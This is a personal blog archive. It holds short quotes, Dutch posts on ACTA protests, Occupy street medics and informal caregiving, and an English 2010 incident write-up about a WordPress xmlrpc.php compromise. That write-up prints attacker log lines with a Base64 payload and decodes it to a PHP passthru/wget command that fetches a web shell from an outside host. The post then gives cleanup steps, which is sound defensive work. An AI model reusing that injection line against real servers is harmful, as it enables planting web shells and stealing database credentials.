Go with the flow and you will grow, Swim against the stream and you will drown your dream.

March 23rd, 2013 by Rudolf

“Go with the flow and you will grow,
Swim against the stream and you will drown your dream.” — Rudolf Maduro (quote)

, , , , ,

Quote about enemies – The better you are at the job you do, the more enemies you are destined to make

December 10th, 2012 by Rudolf

Quote about Enemies

“The better you are at the job you do, the more enemies you are destined to make” – Rudolf Maduro

 

, , , ,

De ACTA het nieuwe economisch/politieke dwangmiddel voor de samenleving

February 10th, 2012 by Rudolf

De ACTA het nieuwe economisch/politieke dwangmiddel voor de samenleving

We leven in een samenleving waarin mensen er blindelings vanuit gaan dat politici en bedrijven het beste voor ons hebben. Van politici zou je verwachten dat ze voor de mensen in de samenleving zullen zorgen en opkomen voor hun burgerrechten. Van de entertainment industrie zou je verwachten dat ze een bijdrage leveren zodat mensen een plezierig en vrij leven kunnen leiden.

Mis dus! Zo is de ACTA bedoeld om niet alleen beter censuur op te leggen maar ook om samenlevingen te voorzien van onder andere duur voedsel en gezondheidszorg. Het is een puur economisch dwangmiddel om te kunnen profiteren van mensen in plaats van de humaniteit van dienst te zijn.

De Nederlandse Politiek: discrimineert op grote schaal haar eigen burgers, fascistische landelijke discriminatie van ggz patiënten door Minister Edith Schippers VVD, fascistische boerka verbod door de PVV, fascistische meldpunt tegen andere Europese Burgers (Polen) door de PVV. Ze laten een stichting zoals BREIN rustig zijn gang gaan. Ze doen alsof ze tegen Internetcensuur zijn door wat Kamervragen te stellen die ze dezelfde week weer tegenspreken om juist te vragen voor extra Internetcensuur maatregelen.

Doorzichtig of consequent zijn ze bij de D66, PVV, VVD en de SP in ieder geval niet. Bij de SP was al heel duidelijk te zien dat ze geld in de partijkas vele malen belangrijker vinden dan het voeren van hongerige kinderen via de voedselbank. Zo mag Simon Polman van de SP oprotten van de SP omdat hij kiest om mensen die honger lijden in de samenleving te voeren in plaats van geld af te dragen aan de partij. Humaniteit is een onbekend woord bij de politici, bij hun draait het alleen om geld en niet om de mens. Zo zal de SP liever kinderen honger laten leiden dan hun wat te eten geven.

De Entertainment Industrie: in naam van weinigen proberen ze wereldwijd te lobbyen voor Internetcensuur maatregelen om zo copyrights te beschermen. Alhoewel het mogen hebben van een copyright een mensenrecht is mag het natuurlijk niet zo zijn dat een enkel mensenrecht de rechten van vele mensen zal schenden. Met andere woorden Internetcensuur voor het beschermen van mensen hun geldbuidel ten koste van vrijheden van de hele maatschappij weegt dus nooit af met de rechten van 1 enkel persoon of organisatie.

Wij gaan demonstreren, tegen de ACTA het nieuwste speeltje van entertainment industrie en de overheid om mensen in de toekomst gevangen te kunnen houden in een grip van ondoorzichtige censuur.

Morgen zal de priesteres van de Kopimi Kerk en ik aanwezig zijn in Amsterdam op de Dam om 14:00 tot 17:00

Wat is de ACTA en hoe is dit tot stand gekomen zonder dat iemand ervan wist:

, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,

Gewonde Politie geholpen door streetmedics van Occupy Den Haag

December 16th, 2011 by Rudolf

Gewonde Politie geholpen door streetmedics van Occupy Den Haag

Zoals meerdere van jullie al weten  doe ik sinds 16 oktober 2011 ook mee aan de organisatie Eerste Hulp bij Akties deze coördineren landelijk vrijwillige getrainde EHBO’ers om mee te lopen tijdens akties en demonstraties door heel Nederland. Dan ga je denken waarom EHBO tijdens een aktie het is toch veilig hier in Nederland?

Hoewel hulpdiensten meestal binnen enkele minuten ter plekke zijn bij een ongeval kunnen de eerste minuten levensreddend zijn. Je moet hierbij denken aan een ernstige bloeding of hartstilstand. Getrainde Streetmedics (EHBO’ers) kunnen ernstige bloedingen verzorgen, hart reanimatie geven totdat de hulpdiensten beschikbaar zijn eventueel een aanwezige AED(automatische defebrilator) bedienen. Afkoeling en Shock bestrijden.

Bij charges door de ME kunnen ze verwondingen van demonstranten verzorgen onder andere kneuzingen voorzien van instant coldpacks. Een eventuele botbreuk immobiliseren. Het flushen van neus, mond en ogen van een demonstrant als ze bespoten worden met pepperspray.

Nou ga je denken dat de taken van een Occupy Streetmedic zich alleen maar beperken tot de actievoerders. Dit is vanuit het Occupy Principe niet eens mogelijk. Wij zijn er voor iedereen die hulp nodig hebben. Dus ook passanten die langslopen of die we tegen komen onderweg naar onze standplaatsen.

Een goed voorbeeld is gisteren 15 december 2011 omstreeks 17.00 u precies 2 maanden nadat Occupy van start is gegaan. In Den Haag staat er aan de overkant van het Malieveld een ESSO station nabij dit station is er door een auto een brommer geschept.

De brommerrijder is met een smak op zijn rug op het fietspad geland en is daar blijven liggen. Binnen de minuut waren er twee Occupy Den Haag Steetmedics waaronder ik ter plekke. Samen met een andere automobilist die was gestopt en overduidelijk EHBO’er bleek te zijn en een agente in burger.

Het slachtoffer is aangesproken, veilig gesteld van naderend verkeer,  beschermd tegen de kou met een speciale foliedeken die standaard in onze Streetmedic uitrusting zit. Verder is het slachtoffer rustig gehouden en tijdelijk geimmobiliseerd tot de ambulance kwam en de zorg overnam.

Dit is duidelijk een goed voorbeeld hoe burgers met elkaar om moeten gaan, goede training zorgt voor eerste hulp op het juiste moment en het tijdig kunnen alarmeren van de hulpdiensten. Nou hadden we veel geluk dat we daar met 4 EHBO’ers stonden rond het slachtoffer. Helaas is de realiteit zo dat er weinigen daadwerkelijk een EHBO certificaat in bezit hebben of deze hebben laten verlopen.  Waardoor er vaak bij ongevallen hulp aan een slachtoffer wordt onthouden omdat men bang of onzeker is om te helpen.

Vanuit het Occupy gedachte wil ik hieraan verandering in gaan brengen. Al een tijd geleden heb ik mijn oude Medic First Aid instructeursschap laten vallen. Nu heb ik het vorige maand maar toch gewaagd en een omscholing gedaan naar het Emergency First Response programma. Dit zodat ik als instructeur nieuwe Streetmedics kan opleiden die hulp durven te geven ondanks de situatie.

Het slachtoffer bleek overigens een politieagent in burger te zijn dus was hij op zich het perfecte slachtoffer voor een case scenario  hoe eerste hulp verlening in een ideale situatie uit zou moeten zien. Hoe meer First Responders er zijn hoe rustiger en veiliger het verloop van de hulpverlening gaat, hoe veiliger het slachtoffer zich voelt en hoe sneller professionele hulp kan worden ingeschakeld.

Wij van het Streetmedic team in Den Haag willen dus hierbij een dank geven aan de anonieme bestuurder van de auto die te hulp schoot, de agente in burger die de plaats van het ongeval veilig heeft gehouden. Mijn mede team maatje van de Streetmedics de EHBA voor het geven van voldoende voorlichting en natuurlijk het ambulance team die supersnel ter plekke waren.

Binnenkort hoop ik de tijd te hebben om een workshop te geven, hoe wij als mens ons dienstbaar kunnen opstellen in een noodgeval om anderen zonder angst te helpen.

Ook wil ik graag andere vrijwilligers aanmoedigen die zich getrokken voelen tot het geven van diensten als vrijwillige Streetmedic om contact met me op te zoeken. OOK al heb je nog geen EBHO kennis, ik ben een EHBO instructeur en ik kan deze training dus ook geven tegen een kleine vergoeding van materiaalkosten. De Training die ik geef is inclusief het leren gebruiken van een AED(automatische defibrillator)

Om je een idee te geven wat je te wachten staat tijdens training zie filmpje hieronder (in het Engels)

, , , , , , , , ,

WordPress xmlrpc.php flaw exploited to install a WSO 2.1 Web Shell by oRb

October 30th, 2010 by Rudolf

WordPress xmlrpc.php flaw exploited to install a “WSO 2.1 Web Shell by oRb”

Below you can see in the copy of the apache logs how the Russian exploiter first creates an account on the exploitable wordpress system. It is useful to disable automated registrations on your wordpress system. However sometimes you want this to be open if you have a forum installed on your wordpress system.

95.52.64.98 – - [30/Oct/2010:17:10:49 +0200] “POST /wp-login.php?action=register HTTP/1.1″ 302 20 “http://www……..org/wp-login.php?action=register” “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)”

95.52.64.98 – - [30/Oct/2010:17:11:17 +0200] “POST /wp-login.php HTTP/1.0″ 302 – “http://www…….org/wp-login.php” “Opera”

After logging in you can see how the cracker installs his remote shell remotely from another compromised website by abusing an exploit in xmlrpc.php file.

95.52.64.98 – - [30/Oct/2010:17:11:20 +0200] “POST /xmlrpc.php HTTP/1.0″ 200 4366 “cHJpbnQgJzxtYWdpY19zZW9fdG9vbHo+JztwYXNzdGhydSgid2dldCBodHRwOi8vd3d3LmVkdHV0b3JpYWwubmV0L3dfb2xkLnR4dDsgbXYgd19vbGQudHh0IGNhY2hlLnBocDsgbHMgLWFsOyBwd2QiKTtleGl0Ow==” “Opera”

95.52.64.98 – - [30/Oct/2010:17:11:22 +0200] “POST /wp-admin//options-permalink.php HTTP/1.0″ 200 9491 “http://www…….org/wp-admin//options-permalink.php” “Opera”

You can read that the xmlrpc.php is injected with Base64 encoded input. If you decode the Base64 encoded string it reads something like this:

print ‘<magic_seo_toolz>’;passthru(“wget http://www.edtutorial.net/w_old.txt; mv w_old.txt cache.php; ls -al; pwd”);exit;

This is php code to retrieve a remotely hosted file w_old.txt and renaming it to cache.php file on the server.

cache.php is the name of the remote web shell you can access this file yourself if no password has been set by the cracker. Main issue with this shell is that the wp-config.php is readable as text so your database username and password are compromised, you must change your password after you fixed the issue!

95.52.64.98 – - [30/Oct/2010:17:12:14 +0200] “POST /cache.php HTTP/1.1″ 200 4510 “/cache.php” “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)”

How was this possible? First of all the webroot directory had the wrong permissions 777 and second the wordpress installation was one year old and had some XML-RPC exploitable issues.

How to fix this once your site has been compromised?

  1. The permissions of the webroot must be changed to 755.
  2. Then the wordpress installation must be deleted and a whole new install must be copied to the server.  Be sure to retain a copy of the web shell for your hosting security officer.
  3. After this the password of the wordpress database username has to be changed.
  4. The wordpress database must be restored from a backup so any spam links injected since the crack are removed.
  5. The wordpress database must be upgraded, can be done by the admin via wp-admin.
  6. Last but not least the whole shared server had to be scanned for any extra shells owned by user www-data, httpd or user apache depending on the operating system. So if you are hosted on a shared hosting platform you must inform your security officer that your wordpress installation was compromised so he/she can perform a security check of the server.
  7. Backup, backup, backup! Be sure to always have multiple backups of your wordpress database on your own pc. This exploit is mostly abused by blackhat SEO companies to spamvertise their websites via your RSS feed and having a “clean” backup will save you a lot of time.

If in doubt and you are in need of help contact me ;-)

If this post has been useful for you buy me coffee donate to my PayPal :-p

(c) Rudolf Maduro 2010

, , , , ,

Mantelzorg overkomt je

October 12th, 2010 by Rudolf

Mantelzorg overkomt je

Niemand zal vrijwillig mantelzorger worden dit is een situatie wat je overkomt. Het is zorgwekkend hoe er in Nederland met mantelzorgers wordt omgegaan. Zowel de gemeente als zorgverleners bieden veel te weinig ondersteuning om deze groep goedbedoelende burgers tegemoet te komen. Netto resultaat 50% van de mantelzorgers hebben last van een klinische depressie. Lees verder….

,

« Previous Entries